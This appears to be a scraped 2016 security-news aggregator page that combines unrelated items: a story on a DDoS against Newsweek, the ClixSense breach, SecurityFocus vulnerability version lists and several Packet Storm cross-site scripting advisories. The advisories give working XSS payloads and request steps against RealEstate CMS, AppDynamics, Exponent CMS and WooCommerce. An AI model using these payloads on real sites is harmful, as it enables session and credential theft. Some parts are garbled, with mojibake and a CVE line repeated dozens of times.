Site

It has been an odd day for Newsweek – its main site was taken offline after it published a story claiming a company owned by Republican presidential candidate Donald Trump broke an embargo against doing deals with Cuba.

The magazine first thought that the sheer volume of interest in its scoop was the cause for the outage, but quickly realized that something more sinister was afoot.

The site was being bombarded by junk traffic from servers all around the world, but the majority came from Russia, the editor in chief Jim Impoco has now said.

"Last night we were on the receiving end of what our IT chief called a 'massive' DoS [denial of service] attack," he told Talking Points Memo.

"As with any DDoS [distributed DoS] attack, there are lots of IP addresses, but the main ones are Russian, though that in itself does not prove anything. We are still investigating."

The story, written by staffer Kurt Eichenwald, detailed how former employees of Trump Hotels had arranged a visit to Cuba in 1998 to explore the possibility of joint ventures with the communist regime. A consultancy company called Seven Arrows made the visit, and the funds to pay for the trip were then allegedly hidden as a charitable expense.

Shortly after the story was published, traffic on the site started to rise – as you'd expect in a presidential season with serious allegations being made. But the traffic count continued to rise and eventually brought the site down.

As with any DDoS attack, finding the culprit is nearly impossible. But it appears that the article has pissed off a lot of people who control many Russian servers. ®

Sponsored: Flash storage buyer's guide


The Register - Security

Bugtraq ID: 93257 Class: Input Validation Error CVE: CVE-2016-6607
CVE-2016-6607 Remote: Yes Local: No Published: Jul 07 2016 12:00AM Updated: Sep 30 2016 04:02PM Credit: Emanuel Bronshtein @e3amn2l Vulnerable: Typo3 phpMyAdmin 5.1.6
phpMyAdmin phpMyAdmin 4.6.2
phpMyAdmin phpMyAdmin 4.6.1
phpMyAdmin phpMyAdmin 4.6
phpMyAdmin phpMyAdmin 4.4.15
phpMyAdmin phpMyAdmin 4.4.13
phpMyAdmin phpMyAdmin 4.4.12
phpMyAdmin phpMyAdmin 4.4.11
phpMyAdmin phpMyAdmin 4.4.10
phpMyAdmin phpMyAdmin 4.4.9
phpMyAdmin phpMyAdmin 4.4.8
phpMyAdmin phpMyAdmin 4.4.7
phpMyAdmin phpMyAdmin 4.4.6
phpMyAdmin phpMyAdmin 4.4.5
phpMyAdmin phpMyAdmin 4.4.3
phpMyAdmin phpMyAdmin 4.4.2
phpMyAdmin phpMyAdmin 4.4.1
phpMyAdmin phpMyAdmin 4.4
phpMyAdmin phpMyAdmin 4.0.5
phpMyAdmin phpMyAdmin 4.0.4
phpMyAdmin phpMyAdmin 4.0.3
phpMyAdmin phpMyAdmin 4.0.2
phpMyAdmin phpMyAdmin 4.0.1
phpMyAdmin phpMyAdmin 4.0
phpMyAdmin phpMyAdmin 4.6.3
phpMyAdmin phpMyAdmin 4.4.6.1
phpMyAdmin phpMyAdmin 4.4.6.0
phpMyAdmin phpMyAdmin 4.4.15.7
phpMyAdmin phpMyAdmin 4.4.15.6
phpMyAdmin phpMyAdmin 4.4.15.5
phpMyAdmin phpMyAdmin 4.4.15.4
phpMyAdmin phpMyAdmin 4.4.15.3
phpMyAdmin phpMyAdmin 4.4.15.2
phpMyAdmin phpMyAdmin 4.4.15.1
phpMyAdmin phpMyAdmin 4.4.14.1
phpMyAdmin phpMyAdmin 4.4.14
phpMyAdmin phpMyAdmin 4.4.13.1
phpMyAdmin phpMyAdmin 4.4.1.1
phpMyAdmin phpMyAdmin 4.0.9
phpMyAdmin phpMyAdmin 4.0.8
phpMyAdmin phpMyAdmin 4.0.7
phpMyAdmin phpMyAdmin 4.0.6
phpMyAdmin phpMyAdmin 4.0.4.2
phpMyAdmin phpMyAdmin 4.0.4.1
phpMyAdmin phpMyAdmin 4.0.10.9
phpMyAdmin phpMyAdmin 4.0.10.8
phpMyAdmin phpMyAdmin 4.0.10.7
phpMyAdmin phpMyAdmin 4.0.10.6
phpMyAdmin phpMyAdmin 4.0.10.5
phpMyAdmin phpMyAdmin 4.0.10.4
phpMyAdmin phpMyAdmin 4.0.10.3
phpMyAdmin phpMyAdmin 4.0.10.2
phpMyAdmin phpMyAdmin 4.0.10.16
phpMyAdmin phpMyAdmin 4.0.10.15
phpMyAdmin phpMyAdmin 4.0.10.14
phpMyAdmin phpMyAdmin 4.0.10.13
phpMyAdmin phpMyAdmin 4.0.10.12
phpMyAdmin phpMyAdmin 4.0.10.11
phpMyAdmin phpMyAdmin 4.0.10.10
phpMyAdmin phpMyAdmin 4.0.10.1
phpMyAdmin phpMyAdmin 4.0.10 Not Vulnerable: phpMyAdmin phpMyAdmin 4.6.4
phpMyAdmin phpMyAdmin 4.4.15.8
phpMyAdmin phpMyAdmin 4.0.10.17


SecurityFocus Vulnerabilities

========================================================================
| # Title : Exponent CMS versions 2.3.9 XSS vulnerability
| # Author : indoushka
| # email : [email protected]
| # Tested on : windows 8.1 FranASSais V.(Pro)
| # Version : 2.3.9
| # Vendor : https://sourceforge.net/projects/exponentcms/files/exponent-2.3.9.zip/download
| # Dork : n/a
========================================================================

poc :

This vulnerability affects :/source_selector.php.

Attack details :

URL encoded GET input time was set to 1485925200_947776'():;988077

The input is reflected inside <script> tag between single quotes.

poc :

/source_selector.php?action=showall&module=event&[email protected]&time=1485925200_947776'():;988077

Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------
|
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn |
|
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================


Exploit Files ≈ Packet Storm

  • info
  • discussion
  • exploit
  • solution
  • references
Aternity CVE-2016-5061 Multiple Cross Site Scripting Vulnerabilities

Bugtraq ID: 93210
Class: Input Validation Error
CVE: CVE-2016-5061
CVE-2016-5061
CVE-2016-5061
CVE-2016-5061
CVE-2016-5061
Remote: Yes
Local: No
Published: Sep 28 2016 12:00AM
Updated: Sep 29 2016 12:01AM
Credit: Matthew Benton and Richard Kelley.
Vulnerable: Aternity Aternity 9
Not Vulnerable:


SecurityFocus Vulnerabilities

CVE: CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955
CVE-2016-5955


SecurityFocus Vulnerabilities

i>>?Document Title:
===============
RealEstate CMS 3.00.50 - Cross Site Web Vulnerability

Release Date:
=============
2016-09-08

Vulnerability Disclosure Timeline:
==================================
2016-09-23 : Public Disclosure

Product & Service Introduction:
===============================
RealEstate CMS is a web portal script designed for realty agents , realtor or brokers to sell , buy , trade , rent and letting their client's property through online. It is a web based Content Management System integrated web application platform developed in php, mysql used by real estate companies to promote properties. Feature-rich, SEO-friendly, easy to use interface with Protected admin area to create.

(Copy of the Vendor Homepage: http://www.script4realestate.com/ )

Affected Product(s):
====================
Product: Realestate v3.00.50 - Content Management System

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-
A client-side cross site scripting web vulnerability has been discovered in the official Realestate v3.00.50 content management system.
The vulnerability allows remote attacker to inject own malicious script codes on the client-side of the vulnerable module or service.

A client-side cross site scripting web vulnerability is located in the search engine. The web vulnerability could allow an attacker
to execute javascript in the web-browser of the user or administrator to compromise session credentials. The attacker can connect
to a third account to trigger the issue without knowing the password.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Add (Input)

Vulnerable Parameter(s):
[+] property_name
[+] post_code
[+] property_price

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs [POST] ---
Status: 200 [OK]
Host: realestate.localhost:8000/
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://realestate.localhost:8000/
Cookie: PHPSESSID=8897722dac6adcebc9a966069e91ea83; __unam=6aaa37b-1570a42f57e-507aafb3-2; __utma=261436815.141070340.1473345943.1473345943.1473345943.1; __utmb=261436815.2.10.1473345943; __utmc=261436815; __utmz=261436815.1473345943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 529
block_search=search&property_name='"/>></script><script>alert("vulnerabilitylab")</script>&post_code='"/>></script><script>alert("vulnerabilitylab")</script>&category_id_arr%5B%5D=any&property_type=any&property_price='"/>></script><script>alert("vulnerabilitylab")</script>&property_price-gte=any&property_price-lte=any&feature_room_no-gte=any&feature_bathroom-gte=any&country_id=227&state_id=any&area_id=any&property_owner=any

--- PoC: Source ---
<div class="form-group">
<label>Post Code:</label>
<input type="text" name="post_code" id="post_code" placeholder="Any" value="'"/>></script><script>alert("vulnerabilitylab")</script>" class="form-control">
<input type="hidden" name="block_search" value="search" />
</div>
<div class="form-group">
<input name="property_name" id="property_name" operator="contains" type="text" placeholder="Property Name"
value="'"/>></script><script>alert("vulnerabilitylab")</script>" class="form-control"/>
</div>
<script type="text/javascript">
//<!--
field: "property_price", operator: $ ("#property_price").attr('operator'), value: ""'"/>></script><script>alert("vulnerabilitylab")</script>",
//-->
</script>

Reference(s):
http://realestate.localhost:8000/

[+] Disclaimer [+]
===================
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

Domain: www.zwx.fr
Contact: [email protected]
Social: twitter.com/XSSed.fr
Feeds: www.zwx.fr/feed/
Advisory: www.vulnerability-lab.com/show.php?user=ZwX
packetstormsecurity.com/files/author/12026/
cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
0day.today/author/27461

Copyright A(c) 2016 | ZwX - Security Researcher (Software & web application)


Exploit Files ≈ Packet Storm

=============================================================================================================================================
xss in AppDynamic 4.2.3.1 build No. 57
affected Module : policy Creation module
affected parameter : policy name
tested : Live SaaS server AppDynamic
product : Application performance monitoring tools , used to monitor the application performance by agent installed on remote server & give output according to the rules & policy create ( allow create custom policy ) in GUI tool.
payload : <script>alert(document.cookie)</script>
Security Researcher: Govind Singh aka NullPort

=============================================================================================================================================

1. logged in & Click on Alert & Respond, select Polices & from policies for which application you want to create policies. Click on Create Policy Manually.

2. In Create Policy Give name to the Policy here mine is policy and click on next button.

3. Now click on Create Action a+a from Actions to execute.and press ok

4. Now in Name just simple put your xss payload in Create Diagnostic Session Action & click on ok button.

5. As now policy created with our xss payload now just press save button.

6. As you press on save button payload get execute & you can observe the xss popup with value.


Exploit Files ≈ Packet Storm

Vulnerable: IBM Tivoli Storage Productivity Center 5.2.10
IBM Tivoli Storage Productivity Center 5.2.6
IBM Tivoli Storage Productivity Center 5.2.5
IBM Tivoli Storage Productivity Center 5.2.2
IBM Tivoli Storage Productivity Center 5.2.1 0
IBM Tivoli Storage Productivity Center 5.2
IBM Tivoli Storage Productivity Center 5.2.7.1
IBM Tivoli Storage Productivity Center 5.2.7
IBM Tivoli Storage Productivity Center 5.2.5.1
IBM Tivoli Storage Productivity Center 5.2.4.1
IBM Tivoli Storage Productivity Center 5.2.4
IBM Tivoli Storage Productivity Center 5.2.3
IBM Tivoli Storage Productivity Center 5.2.1.1
IBM Spectrum Control 5.2.11
IBM Spectrum Control 5.2.10
IBM Spectrum Control 5.2.9
IBM Spectrum Control 5.2.8
IBM Spectrum Control 5.2.10.1


SecurityFocus Vulnerabilities

If you’ve ever registered with ClixSense – and millions have – you can consider all your personal information shared with the service compromised.

ClixSense

The company behind the popular Paid To Click site has been breached, the site (Clixsense.com) made to redirect to a gay porn site, its Microsoft Exchange server and webservers compromised, and an old database server containing users’ information pilfered some ten days ago.

The stolen information includes users’ name, email and IP address, home address, date of birth, sex, account balance, payment history, as well as their password in plaintext.

The company has confirmed the hack for Ars Technica, and had said that they have forced a password reset on all of its 6.6 million registered users.

Users who have reused the same password on other online accounts should change it there also, as well as be on the lookout for convincing phishing attempts by crooks using their stolen information.

It is a very realistic scenario, as the attackers are offering the account records for sale, along with emails exchanged by the company’s employees and the complete source code for the site.

They have released a sample of the stolen data, containing that of early users, as proof.

Unlike previous mega data breaches, this one is not old – the user database has been dumped earlier this month, so all the information contained in it should be up to date.

Of course, it’s possible that some users have entered incorrect information when asked, and given what’s happened, I say good on them.

“It has come to our attention that this hacker did get access to our database server for a short period of time. He was able to gain access to this not directly but instead through an old server we were no longer using that had a connection to our database server. (This server has since been terminated),” Clixsense explained in a post about the incident.

“He was able to copy most if not all of our users table, he ran some SQL code that changed the names on accounts to ‘hacked account’ and deleted many forum posts. He also set user balances to $ 0.00.”

After all that, the company had the nerve to say that the incident “has taught us that regardless of what you do to stay secure, it still may not be enough,” and that users’ “ClixSense account information is now much more secure.”

Nevermind that it should have been secure in the first place… Why was an old server that’s no longer in use still connected to their database server? And, for that matter, why did they store passwords in plain text? None of this inspires much confidence that they will “do” security better in the future.

But none of this matters much to the affected users: much of their personal info has been compromised, and there is no going back.


Help Net Security

------------------------------------------------------------------------
Persistent Cross-Site Scripting in Woocommerce WordPress plugin
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A vulnerability exists in the Woocommerce API that allows for the
creation of malicious HTML files when an image is downloaded from an
attacker controlled URL.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160719-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Woocommerce version 2.6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Woocommerce version 2.6.4.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_wordpress_plugin.html

The vulnerability exists in multiple places in the code. This description will use the code located at:
/includes/api/legacy/v3/class-wc-api-products.php
The vulnerable method is called upload_image_from_url. This method is used for adding product and product category images from a URL. wp_check_filetype is used to retrieve a file type for the filename in the URL.

$ wp_filetype = wp_check_filetype( $ file_name, null );

wp_check_filetype checks if the file extension matches the array of extensions returned by wp_get_mime_types. wp_get_mime_types returns a big list of file types, including HTML and most image files. It does not include the PHP file extension.

If the file type cannot be determined by wp_check_filetype from the URL (for example, if the URL ends with .php), the code will retrieve the file from the server headers.

// Ensure we have a file name and type.
if ( ! $ wp_filetype['type'] )
$ headers = wp_remote_retrieve_headers( $ response );
if ( isset( $ headers['content-disposition'] ) && strstr( $ headers['content-disposition'], 'filename=' ) ) {
$ disposition = end( explode( 'filename=', $ headers['content-disposition'] ) );
$ disposition = sanitize_file_name( $ disposition );
$ file_name = $ disposition;
elseif ( isset( $ headers['content-type'] ) && strstr( $ headers['content-type'], 'image/' ) )
$ file_name = 'image.' . str_replace( 'image/', '', $ headers['content-type'] );

The server now has control over the file name by setting the content-disposition header or by setting the content-type header to something like image/html. PHP files can not be created because the method wp_upload_bits will be called on the new file name, and the extension of the new file name must be included in the array returned by wp_get_mime_types.

Other files that contain the vulnerable code pattern are:
/woocommerce/includes/wc-rest-functions.php
/woocommerce/includes/cli/class-wc-cli-product.php
/woocommerce/includes/api/legacy/v3/class-wc-api-products.php
/woocommerce/includes/api/legacy/v2/class-wc-api-products.php

Because WordPress includes itself in the User Agent header when requesting the image, it's possible to an attacker to show images for normal users and to inject HTML files when the Woocommerce API does a request.

HTML files will not be included as a category image but will show up in the media library.
Proof of concept

This attack can be done when the called URL does not end in a file type included in wp_get_mime_types. For example, in the case where a popular image is shown by a PHP script.

On an external server, create a file called image.php with the following content:

<?php
header("content-disposition: filename=poc.html");
echo "<script>alert(1)</script>";
?>

Now perform a PUT request to:

/wc-api/v3/products/categories/<valid id>?consumer_key=<key>&consumer_secret=<secret>

With the JSON content:

"product_category":{"image":"http://<external server>/image.php"}

The category image will be empty, and a file poc.html will appear in the upload folder.

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.


Exploit Files ≈ Packet Storm